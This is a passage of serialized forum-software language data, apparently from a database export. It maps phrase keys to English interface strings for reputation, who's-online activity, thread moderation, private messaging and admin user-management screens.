Positive\";s:9:\"i_approve\";s:9:\"I approve\";s:12:\"i_disapprove\";s:12:\"I disapprove\";s:6:\"leftby\";s:7:\"Left By\";s:7:\"leftfor\";s:8:\"Left For\";s:24:\"minimum_reputation_level\";s:24:\"Minimum Reputation Level\";s:8:\"negative\";s:8:\"Negative\";s:8:\"positive\";s:8:\"Positive\";s:23:\"reputation_on_post_is_x\";s:72:\"Your reputation on this post is %2$s.\";s:17:\"somewhat_negative\";s:17:\"Somewhat Negative\";s:17:\"somewhat_positive\";s:17:\"Somewhat Positive\";s:23:\"user_reputation_manager\";s:23:\"User Reputation Manager\";s:13:\"very_negative\";s:13:\"Very Negative\";s:13:\"very_positive\";s:13:\"Very Positive\";s:28:\"what_do_you_think_of_xs_post\";s:33:\"What do you think of %1$s\'s post?\";s:30:\"x_reputation_comments_page_y_z\";s:41:\"%1$s Reputation Comments (Page %2$s/%3$s)\";s:28:\"you_have_x_reputation_points\";s:34:\"You have %1$s Reputation point(s).\";s:26:\"your_comments_on_this_post\";s:26:\"Your comments on this post\";}', 'a:174:{s:23:\"activating_registration\";s:23:\"Activating Registration\";s:25:\"admin_control_panel_login\";s:25:\"Admin Control Panel Login\";s:3:\"all\";s:3:\"All\";s:32:\"choosing_forum_to_move_thread_to\";s:32:\"Choosing Forum to Move thread To\";s:23:\"copying_thread_to_forum\";s:31:\"Copying Thread: To Forum:\";s:14:\"creating_album\";s:14:\"Creating Album\";s:14:\"creating_event\";s:14:\"Creating Event\";s:13:\"creating_poll\";s:13:\"Creating Poll\";s:24:\"creating_private_message\";s:24:\"Creating Private Message\";s:21:\"creating_social_group\";s:21:\"Creating Social Group\";s:15:\"creating_thread\";s:15:\"Creating Thread\";s:18:\"creating_user_note\";s:18:\"Creating User Note\";s:14:\"deleting_album\";s:14:\"Deleting Album\";s:24:\"deleting_picture_comment\";s:24:\"Deleting Picture Comment\";s:14:\"deleting_posts\";s:14:\"Deleting Posts\";s:17:\"deleting_redirect\";s:17:\"Deleting Redirect\";s:21:\"deleting_social_group\";s:21:\"Deleting Social Group\";s:26:\"deleting_subscribed_forums\";s:26:\"Deleting Subscribed Forums\";s:27:\"deleting_subscribed_threads\";s:27:\"Deleting Subscribed Threads\";s:15:\"deleting_thread\";s:15:\"Deleting Thread\";s:24:\"deleting_visitor_message\";s:24:\"Deleting Visitor Message\";s:7:\"display\";s:7:\"Display\";s:28:\"downloading_private_messages\";s:28:\"Downloading Private Messages\";s:13:\"editing_album\";s:13:\"Editing Album\";s:16:\"editing_pictures\";s:16:\"Editing Pictures\";s:20:\"editing_social_group\";s:20:\"Editing Social Group\";s:19:\"followed_forum_link\";s:19:\"Followed Forum Link\";s:17:\"giving_infraction\";s:17:\"Giving Infraction\";s:17:\"giving_reputation\";s:17:\"Giving Reputation\";s:6:\"guests\";s:6:\"Guests\";s:26:\"inline_mod_approving_posts\";s:34:\"Inline Moderation: Approving Posts\";s:28:\"inline_mod_approving_threads\";s:36:\"Inline Moderation: Approving Threads\";s:16:\"inline_mod_clear\";s:35:\"Inline Moderation: Clearing Cookies\";s:26:\"inline_mod_closing_threads\";s:34:\"Inline Moderation: Closing Threads\";s:25:\"inline_mod_deleting_posts\";s:33:\"Inline Moderation: Deleting Posts\";s:27:\"inline_mod_deleting_threads\";s:35:\"Inline Moderation: Deleting Threads\";s:24:\"inline_mod_merging_posts\";s:32:\"Inline Moderation: Merging Posts\";s:26:\"inline_mod_merging_threads\";s:34:\"Inline Moderation: Merging Threads\";s:23:\"inline_mod_moving_posts\";s:31:\"Inline Moderation: Moving Posts\";s:25:\"inline_mod_moving_threads\";s:33:\"Inline Moderation: Moving Threads\";s:26:\"inline_mod_opening_threads\";s:34:\"Inline Moderation: Opening Threads\";s:27:\"inline_mod_sticking_threads\";s:35:\"Inline Moderation: Sticking Threads\";s:28:\"inline_mod_unapproving_posts\";s:36:\"Inline Moderation: Unapproving Posts\";s:30:\"inline_mod_unapproving_threads\";s:38:\"Inline Moderation: Unapproving Threads\";s:27:\"inline_mod_undeleting_posts\";s:35:\"Inline Moderation: Undeleting Posts\";s:29:\"inline_mod_undeleting_threads\";s:37:\"Inline Moderation: Undeleting Threads\";s:29:\"inline_mod_unsticking_threads\";s:37:\"Inline Moderation: Unsticking Threads\";s:20:\"joining_social_group\";s:20:\"Joining Social Group\";s:20:\"leaving_social_group\";s:20:\"Leaving Social Group\";s:13:\"location_temp\";s:8:\"Location\";s:10:\"logging_in\";s:10:\"Logging In\";s:11:\"logging_out\";s:11:\"Logging Out\";s:20:\"managing_attachments\";s:20:\"Managing Attachments\";s:17:\"managing_reminder\";s:24:\"Managing Event Reminders\";s:13:\"managing_spam\";s:13:\"Managing Spam\";s:13:\"managing_tags\";s:13:\"Managing Tags\";s:19:\"marking_forums_read\";s:19:\"Marking Forums Read\";s:15:\"merging_threads\";s:15:\"Merging Threads\";s:10:\"moderating\";s:10:\"Moderating\";s:29:\"moderator_control_panel_login\";s:29:\"Moderator Control Panel Login\";s:16:\"modifying_avatar\";s:16:\"Modifying Avatar\";s:29:\"modifying_contact_ignore_list\";s:32:\"Modifying Contact or Ignore List\";s:15:\"modifying_event\";s:15:\"Modifying Event\";s:17:\"modifying_options\";s:17:\"Modifying Options\";s:18:\"modifying_password\";s:18:\"Modifying Password\";s:14:\"modifying_poll\";s:14:\"Modifying Poll\";s:14:\"modifying_post\";s:14:\"Modifying Post\";s:33:\"modifying_private_message_folders\";s:33:\"Modifying Private Message Folders\";s:17:\"modifying_profile\";s:17:\"Modifying Profile\";s:20:\"modifying_profilepic\";s:25:\"Modifying Profile Picture\";s:19:\"modifying_signature\";s:19:\"Modifying Signature\";s:30:\"modifying_subscription_folders\";s:30:\"Modifying Subscription Folders\";s:16:\"modifying_thread\";s:16:\"Modifying Thread\";s:20:\"modifying_usergroups\";s:20:\"Modifying Usergroups\";s:22:\"moving_thread_to_forum\";s:30:\"Moving Thread: To Forum:\";s:36:\"moving_thread_with_redirect_to_forum\";s:46:\"Moving Thread (with Redirect): To Forum:\";s:17:\"open_close_thread\";s:22:\"Opening/Closing Thread\";s:23:\"posting_picture_comment\";s:23:\"Posting Picture Comment\";s:23:\"posting_visitor_message\";s:23:\"Posting Visitor Message\";s:17:\"private_messaging\";s:17:\"Private Messaging\";s:23:\"processing_joinrequests\";s:24:\"Processing Join Requests\";s:7:\"query_x\";s:11:\"Query: %1$s\";s:13:\"rating_thread\";s:13:\"Rating Thread\";s:11:\"registering\";s:11:\"Registering\";s:18:\"replying_to_thread\";s:18:\"Replying to Thread\";s:25:\"reporting_picture_comment\";s:25:\"Reporting Picture Comment\";s:14:\"reporting_post\";s:16:\"Reporting a Post\";s:25:\"reporting_visitor_message\";s:25:\"Reporting Visitor Message\";s:23:\"request_activation_code\";s:26:\"Requesting Activation Code\";s:18:\"resolve_ip_address\";s:18:\"Resolve IP Address\";s:18:\"resolved_host_name\";s:18:\"Resolved Host Name\";s:20:\"reversing_infraction\";s:20:\"Reversing Infraction\";s:11:\"search_bots\";s:11:\"Search Bots\";s:20:\"search_engine_spider\";s:20:\"Search Engine Spider\";s:16:\"searching_forums\";s:16:\"Searching Forums\";s:21:\"searching_member_list\";s:21:\"Searching Member List\";s:19:\"sending_aim_message\";s:19:\"Sending AIM Message\";s:22:\"sending_forum_feedback\";s:22:\"Sending Forum Feedback\";s:19:\"sending_icq_message\";s:19:\"Sending ICQ Message\";s:19:\"sending_msn_message\";s:19:\"Sending MSN Message\";s:21:\"sending_skype_message\";s:21:\"Sending Skype Message\";s:24:\"sending_thread_to_friend\";s:26:\"Sending Thread to a Friend\";s:21:\"sending_yahoo_message\";s:21:\"Sending Yahoo Message\";s:7:\"spiders\";s:7:\"Spiders\";s:20:\"stick_unstick_thread\";s:28:\"Sticking / Unsticking Thread\";s:20:\"subscribing_to_forum\";s:20:\"Subscribing to Forum\";s:21:\"subscribing_to_thread\";s:21:\"Subscribing to Thread\";s:25:\"tracking_private_messages\";s:25:\"Tracking Private Messages\";s:17:\"unable_resolve_ip\";s:28:\"Unable to resolve IP address\";s:16:\"unknown_location\";s:16:\"Unknown Location\";s:18:\"uploading_pictures\";s:18:\"Uploading Pictures\";s:10:\"user_agent\";s:10:\"User Agent\";s:27:\"user_is_invisible_to_others\";s:27:\"User is invisible to others\";s:28:\"user_is_on_your_contact_list\";s:28:\"User is on your contact list\";s:6:\"user_x\";s:10:\"User: %1$s\";s:13:\"viewing_album\";s:13:\"Viewing Album\";s:20:\"viewing_announcement\";s:20:\"Viewing Announcement\";s:16:\"viewing_archives\";s:16:\"Viewing Archives\";s:18:\"viewing_attachment\";s:18:\"Viewing Attachment\";s:23:\"viewing_attachment_list\";s:23:\"Viewing Attachment List\";s:19:\"viewing_attachments\";s:19:\"Viewing Attachments\";s:15:\"viewing_avatars\";s:15:\"Viewing Avatars\";s:15:\"viewing_bb_code\";s:15:\"Viewing BB Code\";s:16:\"viewing_calendar\";s:16:\"Viewing Calendar\";s:20:\"viewing_conversation\";s:20:\"Viewing Conversation\";s:32:\"viewing_deleted_picture_comments\";s:32:\"Viewing Deleted Picture Comments\";s:21:\"viewing_deleted_posts\";s:21:\"Viewing Deleted Posts\";s:37:\"viewing_deleted_social_group_messages\";s:37:\"Viewing Deleted Social Group Messages\";s:23:\"viewing_deleted_threads\";s:23:\"Viewing Deleted Threads\";s:32:\"viewing_deleted_visitor_messages\";s:32:\"Viewing Deleted Visitor Messages\";s:21:\"viewing_error_message\";s:21:\"Viewing Error Message\";s:13:\"viewing_event\";s:13:\"Viewing Event\";s:11:\"viewing_faq\";s:11:\"Viewing FAQ\";s:13:\"viewing_forum\";s:13:\"Viewing Forum\";s:20:\"viewing_forum_closed\";s:30:\"Viewing \'Forum Closed\' Message\";s:21:\"viewing_forum_leaders\";s:21:\"Viewing Forum Leaders\";s:13:\"viewing_index\";s:13:\"Viewing Index\";s:18:\"viewing_infraction\";s:18:\"Viewing Infraction\";s:18:\"viewing_ip_address\";s:18:\"Viewing IP Address\";s:19:\"viewing_member_list\";s:19:\"Viewing Member List\";s:34:\"viewing_moderated_picture_comments\";s:34:\"Viewing Moderated Picture Comments\";s:26:\"viewing_moderated_pictures\";s:26:\"Viewing Moderated Pictures\";s:23:\"viewing_moderated_posts\";s:23:\"Viewing Moderated Posts\";s:39:\"viewing_moderated_social_group_messages\";s:39:\"Viewing Moderated Social Group Messages\";s:25:\"viewing_moderated_threads\";s:25:\"Viewing Moderated Threads\";s:34:\"viewing_moderated_visitor_messages\";s:34:\"Viewing Moderated Visitor Messages\";s:17:\"viewing_new_posts\";s:17:\"Viewing New Posts\";s:29:\"viewing_no_permission_message\";s:31:\"Viewing \'No Permission\' Message\";s:26:\"viewing_paid_subscriptions\";s:26:\"Viewing Paid Subscriptions\";s:15:\"viewing_picture\";s:15:\"Viewing Picture\";s:42:\"viewing_picture_comments_awaiting_approval\";s:42:\"Viewing Picture Comments Awaiting Approval\";s:12:\"viewing_poll\";s:12:\"Viewing Poll\";s:20:\"viewing_post_history\";s:20:\"Viewing Post History\";s:25:\"viewing_printable_version\";s:25:\"Viewing Printable Version\";s:23:\"viewing_private_message\";s:23:\"Viewing Private Message\";s:15:\"viewing_smilies\";s:15:\"Viewing Smilies\";s:20:\"viewing_social_group\";s:20:\"Viewing Social Group\";s:25:\"viewing_social_group_list\";s:25:\"Viewing Social Group List\";s:31:\"viewing_social_group_memberlist\";s:34:\"Viewing Social Group\'s Member List\";s:34:\"viewing_social_group_subscriptions\";s:34:\"Viewing Social Group Subscriptions\";s:26:\"viewing_subscribed_threads\";s:26:\"Viewing Subscribed Threads\";s:16:\"viewing_tag_list\";s:16:\"Viewing Tag List\";s:14:\"viewing_thread\";s:14:\"Viewing Thread\";s:31:\"viewing_unread_picture_comments\";s:31:\"Viewing Unread Picture Comments\";s:26:\"viewing_user_control_panel\";s:26:\"Viewing User Control Panel\";s:17:\"viewing_user_note\";s:17:\"Viewing User Note\";s:20:\"viewing_user_profile\";s:20:\"Viewing User Profile\";s:19:\"viewing_users_album\";s:20:\"Viewing User\'s Album\";s:18:\"viewing_who_posted\";s:18:\"Viewing Who Posted\";s:19:\"viewing_whos_online\";s:20:\"Viewing Who\'s Online\";s:9:\"viewing_x\";s:12:\"Viewing %1$s\";s:6:\"voting\";s:6:\"voting\";s:16:\"x_and_y_converse\";s:13:\"%1$s and %2$s\";s:21:\"x_spider_searchspider\";s:11:\"%1$s Spider\";}', 'a:123:{s:3:\"any\";s:3:\"Any\";s:19:\"approved_attachment\";s:19:\"Approved Attachment\";s:13:\"approved_post\";s:13:\"Approved Post\";s:15:\"approved_thread\";s:15:\"Approved Thread\";s:18:\"attachment_removed\";s:18:\"Attachment Removed\";s:19:\"attachment_uploaded\";s:19:\"Attachment Uploaded\";s:19:\"awaiting_moderation\";s:19:\"Awaiting Moderation\";s:8:\"category\";s:8:\"Category\";s:20:\"change_expiring_time\";s:29:\"Change Expiring Time From Now\";s:27:\"change_to_expiring_redirect\";s:27:\"Change to Expiring Redirect\";s:28:\"change_to_permanent_redirect\";s:28:\"Change to Permanent Redirect\";s:11:\"child_posts\";s:11:\"Child Posts\";s:6:\"closed\";s:6:\"Closed\";s:15:\"copy_posts_note\";s:198:\"Use the field below to specify the URL of the thread that the selected posts are to be copied into. Note that the copied posts will be inserted into their chronological positions within this thread.\";s:29:\"copy_posts_to_existing_thread\";s:29:\"Copy Posts to Existing Thread\";s:24:\"copy_posts_to_new_thread\";s:24:\"Copy Posts to New Thread\";s:11:\"copy_thread\";s:11:\"Copy Thread\";s:42:\"copying_x_posts_from_y_threads_in_z_forums\";s:58:\"Copying %1$s post(s) from %2$s thread(s) in %3$s forum(s).\";s:14:\"delete_message\";s:14:\"Delete Message\";s:7:\"deleted\";s:7:\"Deleted\";s:14:\"deleted_thread\";s:14:\"Deleted Thread\";s:43:\"deleting_x_posts_from_y_threads_in_z_forums\";s:59:\"Deleting %1$s post(s) from %2$s thread(s) in %3$s forum(s).\";s:32:\"deleting_x_threads_from_y_forums\";s:43:\"Deleting %1$s thread(s) from %2$s forum(s).\";s:16:\"deletion_options\";s:16:\"Deletion Options\";s:15:\"deletion_status\";s:15:\"Deletion Status\";s:8:\"deselect\";s:8:\"Deselect\";s:17:\"deselect_all_tags\";s:17:\"Deselect All Tags\";s:18:\"destination_thread\";s:18:\"Destination Thread\";s:10:\"expires_in\";s:10:\"Expires in\";s:6:\"guests\";s:6:\"Guests\";s:28:\"how_would_you_like_to_delete\";s:29:\"How would you like to delete?\";s:30:\"item_deleted_would_you_like_to\";s:50:\"This item has been \'deleted\'. Would you like to...\";s:16:\"keep_attachments\";s:16:\"Keep Attachments\";s:23:\"leave_expiring_redirect\";s:23:\"Leave Expiring Redirect\";s:16:\"leave_it_deleted\";s:16:\"Leave it deleted\";s:17:\"leave_no_redirect\";s:17:\"Leave No Redirect\";s:24:\"leave_permanent_redirect\";s:24:\"Leave Permanent Redirect\";s:15:\"leave_redirects\";s:15:\"Leave Redirects\";s:4:\"link\";s:4:\"Link\";s:23:\"login_to_reauthenticate\";s:60:\"Please login again to verify the legitimacy of this request.\";s:11:\"manage_post\";s:11:\"Manage Post\";s:17:\"may_rename_thread\";s:39:\"You may rename this thread if you wish.\";s:5:\"merge\";s:5:\"Merge\";s:21:\"merge_rename_selected\";s:21:\"Merge/Rename Selected\";s:10:\"merge_tags\";s:10:\"Merge Tags\";s:13:\"merge_threads\";s:13:\"Merge Threads\";s:42:\"merging_x_posts_from_y_threads_in_z_forums\";s:58:\"Merging %1$s post(s) from %2$s thread(s) in %3$s forum(s).\";s:31:\"merging_x_threads_from_y_forums\";s:42:\"Merging %1$s thread(s) from %2$s forum(s).\";s:16:\"moderated_thread\";s:16:\"Moderated Thread\";s:13:\"moderator_log\";s:13:\"Moderator Log\";s:15:\"moderator_notes\";s:15:\"Moderator Notes\";s:15:\"move_posts_note\";s:191:\"Use the field below to specify the URL of the thread that the selected posts are to be merged into. Note that all posts will be inserted into their chronological positions within this thread.\";s:29:\"move_posts_to_existing_thread\";s:29:\"Move Posts to Existing Thread\";s:24:\"move_posts_to_new_thread\";s:24:\"Move Posts to New Thread\";s:11:\"move_thread\";s:11:\"Move Thread\";s:41:\"moving_moderated_and_soft_deleted_threads\";s:67:\"Moving moderated and soft deleted threads will not leave redirects.\";s:41:\"moving_x_posts_from_y_threads_in_z_forums\";s:57:\"Moving %1$s post(s) from %2$s thread(s) in %3$s forum(s).\";s:30:\"moving_x_threads_from_y_forums\";s:41:\"Moving %1$s thread(s) from %2$s forum(s).\";s:11:\"new_subject\";s:11:\"New Subject\";s:7:\"new_tag\";s:7:\"New Tag\";s:18:\"new_thread_details\";s:18:\"New Thread Details\";s:10:\"no_posting\";s:10:\"No Posting\";s:13:\"normal_thread\";s:13:\"Normal Thread\";s:12:\"not_redirect\";s:12:\"Not Redirect\";s:5:\"notes\";s:5:\"Notes\";s:4:\"open\";s:4:\"Open\";s:6:\"opened\";s:6:\"Opened\";s:13:\"opened_thread\";s:13:\"Opened Thread\";s:17:\"physically_remove\";s:17:\"Physically remove\";s:25:\"physically_remove_message\";s:25:\"Physically Remove Message\";s:11:\"poll_edited\";s:11:\"Poll Edited\";s:5:\"polls\";s:5:\"Polls\";s:31:\"post_merged_from_multiple_posts\";s:31:\"Post merged from multiple posts\";s:19:\"post_x_by_y_removed\";s:32:\"Post %1$s by %2$s Removed\";s:23:\"post_x_by_y_softdeleted\";s:37:\"Post %1$s by %2$s Soft Deleted\";s:13:\"post_x_edited\";s:23:\"Post %1$s Edited\";s:21:\"post_y_by_x_undeleted\";s:34:\"Post %1$s by %2$s Undeleted\";s:17:\"posts_copied_to_x\";s:29:\"Posts copied to threadid %1$s\";s:25:\"posts_moved_to_new_thread\";s:116:\"All the posts you selected on this page will be moved into a new thread, the details of which you must specify here.\";s:19:\"reason_for_deletion\";s:30:\"Reason for Deletion (optional)\";s:14:\"redirect_title\";s:14:\"Redirect Title\";s:6:\"select\";s:6:\"Select\";s:33:\"soft_delete_leave_deleted_message\";s:49:\"\'Soft\' delete - Leave "Deleted" Message\";s:5:\"split\";s:5:\"Split\";s:12:\"split_thread\";s:12:\"Split Thread\";s:5:\"stuck\";s:5:\"Stuck\";s:12:\"stuck_thread\";s:12:\"Stuck Thread\";s:21:\"tag_merge_description\";s:210:\"The tag(s) listed below will be merged with the new tag that you specify. The old tags will be deleted and threads will be updated to use the new tag. If the new tag does not already exist, it will be created.\";s:31:\"this_redirect_expires_on_x_at_y\";s:37:\"This redirect expires on %1$s at %2$s\";s:13:\"thread_closed\";s:6:\"Closed\";s:23:\"thread_contain_one_poll\";s:92:\"Since there are multiple polls, please choose which poll to keep for the destination thread.\";s:18:\"thread_copied_to_x\";s:24:\"Thread copied to \'%1$s\'.\";s:39:\"thread_edited_visible_x_open_y_sticky_z\";s:56:\"Thread edited. (visible: %1$s; open: %2$s; sticky: %3$s)\";s:14:\"thread_is_open\";s:45:\"Thread is open: Users can post in this thread\";s:16:\"thread_is_sticky\";s:63:\"Thread is sticky: Thread remains at top of list thread listings\";s:17:\"thread_is_visible\";s:80:\"Thread is visible: Un-check this box to send this thread to the moderation queue\";s:35:\"thread_merged_from_multiple_threads\";s:35:\"Thread merged from multiple threads\";s:20:\"thread_merged_with_x\";s:26:\"Thread merged with \'%1$s\'.\";s:17:\"thread_moved_to_x\";s:23:\"Thread moved to \'%1$s\'.\";s:31:\"thread_moved_with_redirect_to_a\";s:37:\"Thread moved with redirect to \'%1$s\'.\";s:11:\"thread_open\";s:4:\"Open\";s:23:\"thread_redirect_removed\";s:23:\"Thread Redirect Removed\";s:34:\"thread_redirects_can_not_be_merged\";s:36:\"Thread redirects cannot be merged.\r\n\";s:14:\"thread_removed\";s:14:\"Thread Removed\";s:18:\"thread_softdeleted\";s:19:\"Thread Soft Deleted\";s:43:\"thread_split_from_threadid_a_by_b_on_x_at_d\";s:56:\"Thread split from threadid %1$s by %2$s on %3$s at %4$s.\";s:17:\"thread_split_to_x\";s:30:\"Thread split to threadid %1$s.\";s:12:\"thread_state\";s:12:\"Thread State\";s:13:\"thread_status\";s:13:\"Thread Status\";s:14:\"thread_summary\";s:14:\"Thread Summary\";s:22:\"thread_title_x_changed\";s:38:\"Thread title (original \'%1$s\') changed\";s:16:\"thread_undeleted\";s:16:\"Thread Undeleted\";s:21:\"thread_x_by_y_removed\";s:27:\"Thread %1$s by %2$s Removed\";s:21:\"unapproved_attachment\";s:21:\"Unapproved Attachment\";s:15:\"unapproved_post\";s:15:\"Unapproved Post\";s:17:\"unapproved_thread\";s:17:\"Unapproved Thread\";s:19:\"undelete_it_restore\";s:21:\"Undelete it (restore)\";s:7:\"unstuck\";s:7:\"Unstuck\";s:14:\"unstuck_thread\";s:14:\"Unstuck Thread\";s:26:\"url_of_thread_to_be_merged\";s:26:\"URL of Thread to be Merged\";s:35:\"use_field_to_specify_url_to_combine\";s:157:\"Use the field below to specify the URL of the thread that is to be combined with this one. \r\nYou may specify the merge options on the next screen.\";s:7:\"visible\";s:7:\"Visible\";s:37:\"you_must_have_the_required_permission\";s:114:\"You must have the required permission for this action in all forums from which you have selected threads or posts.\";}', 'a:86:{s:6:\"0_to_9\";s:5:\"0 - 9\";s:6:\"a_to_h\";s:5:\"A - H\";s:12:\"all_messages\";s:12:\"All Messages\";s:3:\"bcc\";s:3:\"BCC\";s:16:\"confirm_deletion\";s:16:\"Confirm Deletion\";s:27:\"confirm_outstanding_receipt\";s:27:\"Confirm Outstanding Receipt\";s:34:\"confirmed_private_message_receipts\";s:34:\"Confirmed Private Message Receipts\";s:3:\"csv\";s:3:\"CSV\";s:17:\"delete_items_in_x\";s:64:\"Are you sure you want to permanently delete all items in \'%1$s\'?\";s:14:\"delete_message\";s:14:\"Delete Message\";s:27:\"delete_message_click_button\";s:107:\"To delete this message, check the appropriate option below and then click the \'Delete this Message\' button.\";s:19:\"delete_this_message\";s:19:\"Delete this Message\";s:21:\"deselect_all_messages\";s:21:\"Deselect all Messages\";s:32:\"download_all_private_messages_as\";s:32:\"Download all Private Messages as\";s:15:\"download_as_csv\";s:15:\"Download as CSV\";s:16:\"download_as_text\";s:16:\"Download as TEXT\";s:15:\"download_as_xml\";s:15:\"Download as XML\";s:9:\"dump_from\";s:4:\"From\";s:20:\"dump_privatemessages\";s:15:\"privatemessages\";s:7:\"dump_to\";s:2:\"To\";s:12:\"empty_folder\";s:12:\"Empty Folder\";s:9:\"file_type\";s:9:\"File Type\";s:6:\"filter\";s:6:\"Filter\";s:11:\"folder_id_x\";s:15:\"Folder id: %1$s\";s:15:\"forward_message\";s:15:\"Forward Message\";s:14:\"forward_prefix\";s:3:\"Fw:\";s:17:\"forwarded_message\";s:17:\"Forwarded Message\";s:6:\"i_to_p\";s:5:\"I - P\";s:10:\"last_month\";s:10:\"Last Month\";s:9:\"last_week\";s:9:\"Last Week\";s:12:\"mark_as_read\";s:12:\"Mark as read\";s:14:\"mark_as_unread\";s:14:\"Mark as unread\";s:20:\"may_send_to_x_people\";s:64:\"You may send your message to up to %1$s people at a time.\";s:15:\"message_history\";s:15:\"Message History\";s:16:\"message_tracking\";s:16:\"Message Tracking\";s:27:\"messages_stored_in_folder_x\";s:36:\"Messages stored in this folder: %1$s\";s:21:\"move_private_messages\";s:21:\"Move Private Messages\";s:18:\"no_message_history\";s:34:\"This message has no saved history.\";s:22:\"no_messages_to_display\";s:58:\"There are no messages to display. Try a different search.\";s:14:\"not_replied_to\";s:14:\"Not Replied To\";s:25:\"not_tracking_any_messages\";s:44:\"You are currently not tracking any messages.\";s:12:\"old_messages\";s:12:\"Old Messages\";s:5:\"other\";s:5:\"Other\";s:21:\"pm_non_contact_option\";s:64:\"Send message to users even if they are not on your contact list.\";s:33:\"pm_non_contact_option_description\";s:238:\"Your options are currently set to accept private messages only from your contacts . If you send a message to a user not on your contact list, they will not be able to reply to you.\";s:23:\"pm_non_contacts_heading\";s:28:\"Send Message to Non-Contacts\";s:24:\"post_new_private_message\";s:24:\"Send New Private Message\";s:33:\"private_message_dump_for_user_x_y\";s:40:\"Private Message Dump for User %1$s; %2$s\";s:23:\"private_message_receipt\";s:23:\"Private Message Receipt\";s:26:\"private_messages_in_folder\";s:26:\"Private Messages in Folder\";s:6:\"q_to_z\";s:5:\"Q - Z\";s:4:\"read\";s:4:\"Read\";s:9:\"read_date\";s:9:\"Read Date\";s:12:\"read_message\";s:12:\"Read Message\";s:13:\"read_messages\";s:13:\"Read Messages\";s:19:\"recipient_usernames\";s:21:\"Recipient Username(s)\";s:10:\"recipients\";s:10:\"Recipients\";s:10:\"replied_to\";s:10:\"Replied To\";s:17:\"repliedto_message\";s:18:\"Replied-to Message\";s:24:\"reply_to_private_message\";s:24:\"Reply to Private Message\";s:27:\"request_receipt_for_message\";s:39:\"Request a read receipt for this message\";s:30:\"save_copy_in_sent_items_folder\";s:73:\"Save a copy of this message in your Sent Items folder.\";s:28:\"select_deselect_all_in_group\";s:35:\"Select / deselect all in this group\";s:17:\"selected_messages\";s:17:\"Selected Messages\";s:6:\"sender\";s:6:\"Sender\";s:9:\"sent_date\";s:9:\"Sent Date\";s:7:\"sent_to\";s:7:\"Sent to\";s:23:\"separate_multiple_names\";s:37:\"Separate multiple user names with \';\'\";s:13:\"show_messages\";s:13:\"Show Messages\";s:16:\"standard_folders\";s:16:\"Standard Folders\";s:4:\"text\";s:4:\"Text\";s:18:\"to_delete_a_folder\";s:139:\"To delete a folder, remove the folder\'s name from the list. All messages stored in this folder will be moved to the Inbox.\";s:31:\"total_messages_in_all_folders_x\";s:42:\"Total messages stored in all folders: %1$s\";s:36:\"unconfirmed_private_message_receipts\";s:36:\"Unconfirmed Private Message Receipts\";s:14:\"unread_message\";s:14:\"Unread Message\";s:15:\"unread_messages\";s:15:\"Unread Messages\";s:15:\"unreadable_data\";s:15:\"Unreadable Data\";s:12:\"view_history\";s:12:\"View History\";s:12:\"view_message\";s:12:\"View Message\";s:21:\"x_contains_y_messages\";s:71:\"%2$s contains %3$s stored messages.\";s:29:\"x_contains_y_z_messages_of_xx\";s:106:\"%1$s contains %2$s messages. You have %3$s messages stored, of a total %4$s allowed.\";s:30:\"x_has_requested_a_read_receipt\";s:44:\"%1$s has requested a read receipt - Confirm?\";s:24:\"x_requested_read_receipt\";s:114:\"%1$s has requested a read receipt - Confirm? \";s:3:\"xml\";s:3:\"XML\";s:25:\"you_have_x_and_y_receipts\";s:104:\"You have %1$s confirmed and %2$s unconfirmed private message receipts.\";s:19:\"your_custom_folders\";s:19:\"Your Custom Folders\";}', 'a:252:{s:10:\"accept_all\";s:10:\"Accept All\";s:14:\"add_new_answer\";s:14:\"Add New Answer\";s:21:\"add_new_custom_avatar\";s:21:\"Add New Custom Avatar\";s:16:\"add_new_question\";s:16:\"Add New Question\";s:29:\"add_new_user_infraction_level\";s:29:\"Add New User Infraction Level\";s:18:\"add_new_user_title\";s:18:\"Add New User Title\";s:21:\"add_paid_subscription\";s:21:\"Add Paid Subscription\";s:16:\"additional_users\";s:16:\"Additional Users\";s:22:\"admin_override_options\";s:22:\"Admin Override Options\";s:22:\"admin_set_html_allowed\";s:29:\"Yes, admin set (HTML allowed)\";s:41:\"all_members_of_this_usergroup_will_revert\";s:67:\"All members of this usergroup will revert to the %1$s group.\";s:30:\"all_posts_will_be_set_to_guest\";s:50:\"All posts made by this user will be set to \'Guest\'\";s:8:\"all_time\";s:8:\"All Time\";s:21:\"allow_access_to_forum\";s:21:\"Allow Access to Forum\";s:6:\"answer\";s:6:\"Answer\";s:7:\"answers\";s:7:\"Answers\";s:68:\"are_you_sure_want_to_delete_private_messages_belonging_to_the_user_x\";s:192:\"Are you sure you want to delete the private messages belonging to the user called \'%1$s\'?(%2$s: %3$s) %4$s This action cannot be undone.\";s:63:\"are_you_sure_want_to_delete_private_messages_sent_by_the_user_x\";s:187:\"Are you sure you want to delete the private messages sent by the user called \'%1$s\'?(%2$s: %3$s) %4$s This action cannot be undone.\";s:43:\"are_you_sure_want_to_delete_subscriptions_x\";s:167:\"Are you sure you want to delete the subscriptions called \'%1$s\'?(%2$s: %3$s) %4$s This action cannot be undone.\";s:34:\"are_you_sure_want_to_delete_user_x\";s:158:\"Are you sure you want to delete the user called \'%1$s\'?(%2$s: %3$s) %4$s This action cannot be undone.\";s:63:\"are_you_sure_want_to_delete_visitor_messages_sent_by_the_user_x\";s:187:\"Are you sure you want to delete the visitor messages sent by the user called \'%1$s\'?(%2$s: %3$s) %4$s This action cannot be undone.\";s:43:\"are_you_sure_you_want_to_delete_this_answer\";s:44:\"Are you sure you want to delete this answer?\";s:45:\"are_you_sure_you_want_to_delete_this_question\";s:46:\"Are you sure you want to delete this question?\";s:47:\"are_you_sure_you_want_to_delete_this_user_title\";s:48:\"Are you sure you want to delete this User Title?\";s:39:\"are_you_sure_you_want_to_merge_x_into_y\";s:120:\"Are you sure you want to merge %1$s into %2$s ? \r\n \r\n%1$s will be deleted after the merge.\";s:22:\"auto_subscription_mode\";s:34:\"Automatic Thread Subscription Mode\";s:24:\"avatars_to_show_per_page\";s:24:\"Avatars to Show Per Page\";s:8:\"ban_user\";s:8:\"Ban User\";s:17:\"birthday_is_after\";s:17:\"Birthday is After\";s:18:\"birthday_is_before\";s:18:\"Birthday is Before\";s:16:\"browsing_options\";s:16:\"Browsing Options\";s:13:\"change_avatar\";s:13:\"Change Avatar\";s:22:\"change_profile_picture\";s:22:\"Change Profile Picture\";s:16:\"change_signature\";s:16:\"Change Signature\";s:24:\"change_signature_picture\";s:24:\"Change Signature Picture\";s:47:\"click_the_button_to_send_password_reminder_to_x\";s:58:\"Click the button below to send a password reminder to %1$s\";s:13:\"confirm_merge\";s:13:\"Confirm 